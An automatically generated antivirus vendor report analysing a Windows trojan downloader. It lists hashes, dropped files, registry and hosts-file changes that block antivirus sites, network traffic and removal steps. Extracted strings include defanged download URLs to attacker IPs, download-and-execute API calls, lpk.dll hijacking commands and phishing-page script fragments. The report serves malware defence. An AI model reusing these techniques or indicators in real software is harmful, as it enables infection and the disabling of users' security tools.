Trojan.Generic.6278340_ef50bb6aed
HEUR:Trojan.Win32.Generic (Kaspersky), Trojan.Generic.6278340 (B) (Emsisoft), Trojan.Generic.6278340 (AdAware), DDoS.Win32.Nitol.FD, Trojan.Win32.IEDummy.FD, Trojan.Win32.Sasfis.FD, VirTool.Win32.DelfInject.FD, mzpefinder_pcap_file.YR, GenericDownloader.YR, DDoSNitol.YR (Lavasoft MAS)
Behaviour: Trojan, VirTool
This description has been automatically generated by the Lavasoft Malware Analysis System and may contain incomplete or inaccurate information.
MD5: ef50bb6aed4044c5b61d6642583ab769
SHA1: 41dd818e62e58081faa3f4b849874e6904bc3bb1
SHA256: 373190468904a0ea82cc76a7ce181b705942ae3785dd3107bbbfdf4e43181ee2
SSDeep: 768:MVCub7ChDTieMB9IqaoWuHnhmqUCai 4USlayHDojY9P7:927YDGl3Iq7WuHEqUExlayH2mj
Size: 50688 bytes
File type: DLL
Platform: WIN32
Entropy: Not Packed
PEID: BorlandDelphi30, UPolyXv05_v6
Company: Xacti, LLC
Created at: 2010-09-14 11:27:39
Analyzed on: WindowsXP SP3 32-bit
Summary:
Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).
Payload
No specific payload has been found.
Process activity
The Trojan creates the following process(es):
taskkill.exe:1228
mhrma.exe:1976
lssaa.exe:1472
regsvr32.exe:560
hrl1.tmp:1676
The Trojan injects its code into the following process(es):
QQExtrenal.exe:1300
svchost.exe:432
Mutexes
The following mutexes were created/opened:
No objects were found.
File activity
The process mhrma.exe:1976 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%System%\jarinet\QQExtrenal.exe (28 bytes)
The process regsvr32.exe:560 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\hrl1.tmp (36 bytes)
The process QQExtrenal.exe:1300 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\SRKX8H05\lssaa[1].exe (7921 bytes)
%WinDir%\inf\lssaa.exe (45 bytes)
%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\OFK7QZUX\down[1].txt (173 bytes)
%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\SRKX8H05\zzd[1].exe (3849 bytes)
%System%\drivers\etc\hosts (898 bytes)
The process hrl1.tmp:1676 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%System%\iigmiy.exe (36 bytes)
Registry activity
The process taskkill.exe:1228 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "66 DB 30 AE A5 DB 97 8D 99 E7 79 A3 DC B8 60 EC"
The process mhrma.exe:1976 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "04 0F 4D 4A 83 33 98 BD 1D A0 94 83 BD 6D DB F5"
The process lssaa.exe:1472 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "90 51 E8 3A C0 50 D7 AF 2E 6C AA 0E 1C 21 B1 85"
The process regsvr32.exe:560 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "BA EB 2F DE F5 35 81 8D EF 07 3A 9D E1 F4 AB 9D"
The process QQExtrenal.exe:1300 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "30 BD 70 FB 9C CA 4E E1 C1 A5 7C DE 25 EE 8F 41"
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\LocalService\Cookies"
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 04 00 00 00 01 00 00 00 00 00 00 00"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5"
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\LocalService\Local Settings\History"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files"
The Trojan modifies IE security zone settings so that all URLs are mapped to the Intranet Zone:
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The Trojan modifies IE security zone settings so that all sites that bypass the proxy are mapped to the Intranet Zone:
"ProxyBypass" = "1"
The Trojan modifies IE security zone settings so that all local web nodes without dots that do not refer to any zone are mapped to the Intranet Zone:
"UNCAsIntranet" = "1"
Proxy settings are disabled:
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Trojan deletes the following value(s) in system registry:
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyOverride"
"AutoConfigURL"
"ProxyServer"
The process hrl1.tmp:1676 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "C1 68 F3 49 6B FF 05 2B 7D 3A 1B 51 89 B7 28 66"
[HKLM\System\CurrentControlSet\Services\Nationalreo]
"Description" = "Providesfht a domain server for NI security."
Dropped PE files
| MD5 | File path |
|---|---|
| ca4f235951413d179b839ab4b772ef63 | c:\Documents and Settings\All Users\Application Data\Adobe\Reader\9.3\ARM\lpk.dll |
| 2dfbee5818c733bfbceb52997356c3a6 | c:\Documents and Settings\LocalService\Local Settings\Temporary Internet Files\Content.IE5\QLSNQ10Z\207023[1].exe |
| 547bca30fa2f34ae928845958e2dc73b | c:\Documents and Settings\LocalService\Local Settings\Temporary Internet Files\Content.IE5\SRKX8H05\lssaa[1].exe |
| ca4f235951413d179b839ab4b772ef63 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Application Data\Adobe\Reader 9.3\Setup Files\Reader9\lpk.dll |
| ca4f235951413d179b839ab4b772ef63 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Application Data\Adobe\Reader 9.3\Setup Files\lpk.dll |
| ca4f235951413d179b839ab4b772ef63 | c:\Perl\bin\lpk.dll |
| 2dfbee5818c733bfbceb52997356c3a6 | c:\WINDOWS\Temp\mhrma.exe |
| ca4f235951413d179b839ab4b772ef63 | c:\WINDOWS\system32\hra33.dll |
| a0ead738be12651816b2d02ff16591ae | c:\WINDOWS\system32\iigmiy.exe |
| 2dfbee5818c733bfbceb52997356c3a6 | c:\WINDOWS\system32\jarinet\QQExtrenal.exe |
HOSTS file anomalies
The Trojan modifies the "%System%\drivers\etc\hosts" file, which is used to translate host names to IP addresses.
The modified file is 402 bytes in size. The following entries are added to the hosts file:
| 127.0.0.1 | www.360.cn |
| 127.0.0.1 | www.kaspersky.com.cn |
| 127.0.0.1 | www.ijinshan.com |
| 127.0.0.1 | www.rising.com.cn |
| 127.0.0.1 | cn.trendmicro.com |
| 127.0.0.1 | www.symantec.com |
| 127.0.0.1 | sd.360.cn |
| 127.0.0.1 | www.eset.com.cn |
| 127.0.0.1 | www.avast.com |
| 127.0.0.1 | www.micropoint.com.cn |
| 127.0.0.1 | www.avira.com |
| 127.0.0.1 | www.avg.com |
| 127.0.0.1 | www.jiangmin.com |
| 127.0.0.1 | www.ggsafe.com |
| 127.0.0.1 | guanjia.qq.com |
Rootkit activity
No anomalies have been detected.
Propagation
VersionInfo
No information is available.
PE Sections
| Name | Virtual Address | Virtual Size | Raw Size | Entropy | Section MD5 |
|---|---|---|---|---|---|
| .text | 4096 | 4853 | 5120 | 4.22182 | 56a4660d1dce36d81c7173fe2bdaa8da |
| .rdata | 12288 | 2617 | 3072 | 3.09371 | c375b8bfb64c0a66ffa8284e48d9e40a |
| .data | 16384 | 1500 | 512 | 0.112976 | 0b2e7741e0c0fc65af1542e370d89f53 |
| .CRT | 20480 | 4 | 512 | 0.042395 | dcbbf4e61fb806ed312aaf3c094dc153 |
| .rsrc | 24576 | 39228 | 39424 | 4.02044 | 95b22bf3bdd3071cfc5a4f787b88c49f |
| .reloc | 65536 | 700 | 1024 | 2.971 | 9c7cbab195c7f30b2d2a7924e5a5dc92 |
Dropped from:
Downloaded by:
Similar by SSDeep:
Similar by Lavasoft Polymorphic Checker:
URLs
| URL | IP |
|---|---|
| hxxp://192.240.107.44/toopu2.png | |
| www.mojimojimojimoji.com | |
IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)
ET POLICY HTTP Request on Unusual Port Possibly Hostile
ET MALWARE Possible Windows executable sent when remote host claims to send a Text File
Traffic
GET /toopu2.png HTTP/1.1
Accept: */*
Referer:
Accept-Language: zh-cn
UA-CPU: x86
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50215)
Host: 192.240.107.44
Connection: Keep-Alive
Cookie:
HTTP/1.1 200 OK
Content-Type: image/png
Last-Modified: Thu, 28 Apr 2016 03:24:07 GMT
Accept-Ranges: bytes
ETag: "9c2a476cfda0d11:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Mon, 30 May 2016 22:15:32 GMT
Content-Length: 286377
<<< skipped >>>
The Trojan connects to the servers at the following location(s):
.text
`.data
.rsrc
msvcrt.dll
ADVAPI32.dll
KERNEL32.dll
NTDLL.DLL
USER32.dll
ole32.dll
regsvr32.pdb
_wcmdln
RegCloseKey
RegOpenKeyExW
Excessive # of DLL's on cmdline
5.1.2600.5512 (xpsp.080413-2105)
REGSVR32.EXE
Windows
Operating System
5.1.2600.5512
Usage: regsvr32 [/u] [/s] [/n] [/i[:cmdline]] dllname
Call DllInstall passing it an optional [cmdline]; when used with /u calls dll uninstall
Unrecognized flag: %1"Extra argument on command line: This command is only valid when an OLE Custom Control project is open.
LoadLibrary("%1") failed - ,%1 was loaded, but the %2 entry point was not found.%1 does not appear to be a .DLL or .OCX file.V%1 was loaded, but the %2 entry point was not found.
OleUninitialize failed.["%1" is not an executable file and no registration
svchost.exe_432:
.text
`.rdata
@.data
.rsrc
ADVAPI32.dll
USER32.dll
GET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htm
RegCloseKey
RegOpenKeyExA
RegOpenKeyA
SHLWAPI.dll
ShellExecuteA
SHELL32.dll
WS2_32.dll
MSVCRT.dll
_acmdln
WinExec
KERNEL32.dll
0.0.0.0
hXXp://VVV.mojimojimojimoji.com/testq.html
VVV.mojimojimojimoji.com:8088
%u.%u.%u.%u
hra%u.dll
iexplore.exe
stf%c%c%c%c%c.exe
URLDownloadToFileA
urlmon.dll
%c%c%c%c%c.exe
PlusCtrl.dll
%c%c%c%c%c%c.exe
%u MB
%u MHz
Windows NT
Windows 7
Windows 2008
Windows Vista
Windows 2003
Windows XP
Windows 2000
SOFTWARE\Microsoft\Windows NT\CurrentVersion
\Program Files\Internet Explorer\iexplore.exe
#0%s!
%s/%s
GET %s HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*
User-Agent:Mozilla/4.0 (compatible; MSIE %d.0; Windows NT %d.1; SV1)
Host: %s:%d
Host: %s
User-Agent:Mozilla/5.0 (X11; U; Linux i686; en-US; re:1.4.0) Gecko/20080808 Firefox/%d.0
Referer: hXXp://%s:80/hXXp://%s
%s %s%s
User-Agent:Mozilla/4.0 (compatible; MSIE %d.00; Windows NT %d.0; MyIE 3.01)
User-Agent:Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
%d.%d.%d.%d
192.168.1.244
svchost.exe
ntdll.dll
@.reloc
lpk.dll
cmd /c RD /s /q "%s"
"%s" a -r -ep1"%s" "%s" "%s\lpk.dll"
"%s" x "%s" *.exe "%s\"
cmd /c %s vb "%s" lpk.dll|find /i "lpk.dll"
rar.exe
svchost.exe_432_rwx_00400000_0000C000: (strings identical to svchost.exe_432 above)
QQExtrenal.exe_1300:
.text
`.data
.rsrc
MSVBVM60.DLL
# This is a sample HOSTS file used by Microsoft TCP/IP for Windows.
# 102.54.94.97 rhino.acme.com # source server
# 38.25.63.10 x.acme.com # x client host
127.0.0.1 localhost
127.0.0.1 VVV.ijinshan.com
127.0.0.1 VVV.360.cn
127.0.0.1 VVV.rising.com.cn
127.0.0.1 kaba365.com
xxD.Downloader
VB5!6&vb6chs.dll
D:\Program Files\Microsoft Visual Studio\VB98\VB6.OLB
advapi32.dll
RegCreateKeyA
RegCloseKey
VBA6.DLL
c:\windows\system32\jarinet
cmd /c taskkill /f /im QQExtrenal.exe
hXXp://
%System%\drivers\etc\hosts
Microsoft.XMLHTTP
Adodb.Stream
c:\windows\inf\
Software\Microsoft\Windows\CurrentVersion\Run
c:\windows\system32\jarinet\QQExtrenal.exe
c:\windows\system32\jarinet\QQExtrenal.exe "
.exe"
xxDown.exe
lssaa.exe_1472:
.text
`.rdata
@.data
__MSVCRT_HEAP_SELECT
user32.dll
KERNEL32.dll
USER32.dll
ADVAPI32.dll
WS2_32.dll
GetCPInfo
.rsrc
GET %s HTTP/1.1
Referer: %s
Accept-Language: %s
User-Agent: %s
Host: %s
Cookie: %s
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50215)
hXXp://192.240.107.44/toopu2.png
c:\windows\inf\lssaa.exe
comine.exe_212:
.text
`.data
.rsrc
MSVBVM60.DLL
vb6chs.dll
d:\Program Files\Microsoft Visual Studio\VB98\VB6.OLB
psapi.dll
kernel32.dll
NTDLL.DLL
shell32.dll
SHFileOperationA
ShellExecuteA
VBA6.DLL
1.vbp
hXXp://VVV.hao12338.com/?index
IEXPLORE.EXE|TTRAVELER.EXE|SOGOUEXPLORER.EXE|360SE.EXE|GREENBROWSER.EXE|FIREFOX.EXE|MAXTHON.EXE|THEWORLD.EXE|OPERA.EXE|CHROME.EXE|SAFARI.EXE|NETSCAPE.EXE
%Program Files%\Windows Media Player
%Program Files%
explorer.exe
WScript.Shell
Iexplore.exe
wscript.shell
cmd /c ping 127.0.0.1 -n 2&del
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Windows
%Program Files%\Windows Media Player\comine.exe
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Start Page
%Program Files%\Internet Explorer\iexplore.exe
WindowStyle
Hotkey
serv.dat
spolsv.exe_1536:
.text
`.rdata
@.data
__MSVCRT_HEAP_SELECT
user32.dll
WinExec
GetWindowsDirectoryA
KERNEL32.dll
USER32.dll
RegCloseKey
RegOpenKeyA
ADVAPI32.dll
ShellExecuteA
SHELL32.dll
InternetOpenUrlA
FindCloseUrlCache
FindNextUrlCacheEntryA
DeleteUrlCacheEntry
FindFirstUrlCacheEntryA
WININET.dll
URLDownloadToFileA
urlmon.dll
GetCPInfo
Software\Microsoft\Windows\CurrentVersion\Run
127.0.0.1 VVV.360.cn
127.0.0.1 VVV.kaspersky.com.cn
127.0.0.1 VVV.ijinshan.com
127.0.0.1 VVV.rising.com.cn
127.0.0.1 cn.trendmicro.com
127.0.0.1 VVV.symantec.com
127.0.0.1 sd.360.cn
127.0.0.1 VVV.eset.com.cn
127.0.0.1 VVV.avast.com
127.0.0.1 VVV.micropoint.com.cn
127.0.0.1 VVV.avira.com
127.0.0.1 VVV.avg.com
127.0.0.1 VVV.jiangmin.com
127.0.0.1 VVV.ggsafe.com
127.0.0.1 guanjia.qq.com
hXXp://192.240.107.42:8914/test/shua.txt
hXXp://192.240.107.42:8914/test/down.txt
%Program Files%\Internet Explorer\iexplore.exe
del "%s"
if exist "%s" goto nimei
del_.bat
hXXp://
spolsv.exe
\spolsv.exe
conime.exe
%WinDir%\spolsv.exe
lll.exe_1840:
.text
`.rdata
@.data
KERNEL32.dll
EnumWindows
USER32.dll
RegCloseKey
RegOpenKeyExA
ADVAPI32.dll
WS2_32.dll
MSVCP60.dll
MSVCRT.dll
DeleteUrlCacheEntry
WININET.dll
URLDownloadToFileA
urlmon.dll
hXXp://124.232.158.94:1932/index.htm
201508100029
124.232.158.94
dk.23145.com
Applications\iexplore.exe\SHELL\OPEN\COMMAND
%s?%c%c%c%c%c
%s%c%c%c%c%c.htm
122.224.34.79
iexplore.exe_900:
.text
`.data
.rsrc
msvcrt.dll
KERNEL32.dll
NTDLL.DLL
USER32.dll
SHLWAPI.dll
SHDOCVW.dll
Software\Microsoft\Windows\CurrentVersion\Explorer\BrowseNewProcess
IE-X-X
rsabase.dll
System\CurrentControlSet\Control\Windows
dw15 -x -s %u
watson.microsoft.com
IEWatsonURL
%s -h %u
iedw.exe
Iexplore.XPExceptionFilter
jscript.DLL
mshtml.dll
mlang.dll
urlmon.dll
wininet.dll
shdocvw.DLL
browseui.DLL
comctl32.DLL
IEXPLORE.EXE
iexplore.pdb
ADVAPI32.dll
MsgWaitForMultipleObjects
IExplorer.EXE
browseui.dll
shdocvw.dll
6.00.2900.5512 (xpsp.080413-2105)
Windows
Operating System
6.00.2900.5512
te.exe_1244:
.idata
.rdata
P.reloc
P.rsrc
kernel32.dll
0123456789
oleaut32.dll
EVariantBadIndexError
127.0.0.1
hXXp://
ole32.dll
Software\Microsoft\Windows\CurrentVersion\Internet Settings
SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\User Agent\Post Platform
SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Accepted Documents
Windows NT
self.location
window.location=document.URL "
.URL "
window.location=
var customer = getCookie("safe");if (customer != "ver3.1.2"){alert("MSScriptControl.ScriptControl.1
document.write(eval("document.write(
URL "
window.location
document.URL
window.history.forward(1);
?jdfwkey
jdfwkey
document.getElementsByTagName
= document.getElementById("num").valuessfwkey
window.history.forward(1)
window.confirm("ment.URL
InternetExplorer.Application
HTTP/1.1
location="/codeimg.htm"
/codeimg.htm
TLoginSock$
2, ip/port
,web complete
httpref:
2000000000
/safe123.jsp
/safe123.jsp?username=
&key=
con.document.write('</body>'con.document.write('/login.jsp?username
/login.jsp
ipspro.jsp?
flash.swf
/ecatflash.swf
<script>window.close
aqdkey:
/codeflash.htm
69.165.66.213
fdipport:
23.251.41.170
user32.dll
GetKeyboardType
advapi32.dll
RegOpenKeyExA
RegCloseKey
RegQueryInfoKeyA
RegFlushKey
RegCreateKeyExA
WinExec
GetCPInfo
wsock32.dll
wininet.dll
InternetOpenUrlA
FindNextUrlCacheEntryA
FindFirstUrlCacheEntryA
FindCloseUrlCache
DeleteUrlCacheEntry
KWindows
HuntHTTPDownload
vUCmdList
/Variant does not reference an automation object7Dispatch methods do not support more than 64 parameters
Cannot assign a %s to a %s%String list does not allow duplicates
Cannot create file "%s". %s
Cannot open file "%s". %s
Invalid data type for '%s' List capacity out of bounds (%d)
List count out of bounds (%d)
List index out of bounds (%d)
Failed to get data for '%s'
%s.Seek not implemented$Operation not allowed on sorted list
OLE error %.8x.Method '%s' not supported by automation object
Interface not supported
%s (%s, line %d)
Abstract Error?Access violation at address %p in module '%s'. %s of address %p
System Error. Code: %d.
Invalid variant operation
Invalid NULL variant operation%Invalid variant operation (%s%.8x)
%s5Could not convert variant of type (%s) into type (%s)=Overflow while converting variant of type (%s) into type (%s)
Operation not supported
External exception %x
Invalid pointer operation
Invalid class typecast0Access violation at address %p. %s of address %p
Privileged instruction(Exception %s in module %s at %p.
Application Error1Format '%s' invalid or incompatible with argument
No argument for format '%s'"Variant method calls not supported
!'%s' is not a valid integer value
I/O error %d
Integer overflow Invalid floating point operation
Remove it with Ad-Aware
- Click here to download and install Ad-Aware Free Antivirus.
- Update the definition files.
- Run a full scan of your computer.
Manual removal*
- Terminate malicious process(es) (How to End a Process With the Task Manager):
taskkill.exe:1228
mhrma.exe:1976
lssaa.exe:1472
regsvr32.exe:560
hrl1.tmp:1676
- Delete the original Trojan file.
- Delete or disinfect the following files created/modified by the Trojan:
%System%\jarinet\QQExtrenal.exe (28 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\hrl1.tmp (36 bytes)
%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\SRKX8H05\lssaa[1].exe (7921 bytes)
%WinDir%\inf\lssaa.exe (45 bytes)
%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\OFK7QZUX\down[1].txt (173 bytes)
%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\SRKX8H05\zzd[1].exe (3849 bytes)
%System%\drivers\etc\hosts (898 bytes)
%System%\iigmiy.exe (36 bytes)
- Restore the original content of the HOSTS file (%System%\drivers\etc\hosts):
127.0.0.1 localhost
- Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
- Reboot the computer.
*Manual removal may cause unexpected system behaviour and should be performed at your own risk.